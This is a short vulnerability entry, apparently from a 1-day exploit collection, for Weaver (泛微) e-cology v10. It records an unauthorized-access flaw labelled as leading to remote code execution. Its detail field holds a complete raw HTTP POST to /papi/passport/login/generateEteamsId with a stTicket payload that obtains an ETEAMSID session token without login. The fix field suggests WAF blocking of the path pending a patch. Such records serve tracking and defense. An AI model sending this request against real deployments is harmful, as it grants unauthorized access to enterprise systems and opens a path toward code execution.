vendor = "泛微"
name = "泛微e-cology-v10远程代码执行漏洞-获取ETEAMSID"
type = "未授权访问"
version = "未知"
path = "/papi/passport/login/generateEteamsId"
detail = "POST /papi/passport/login/generateEteamsId HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 56 stTicket=ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "1day"
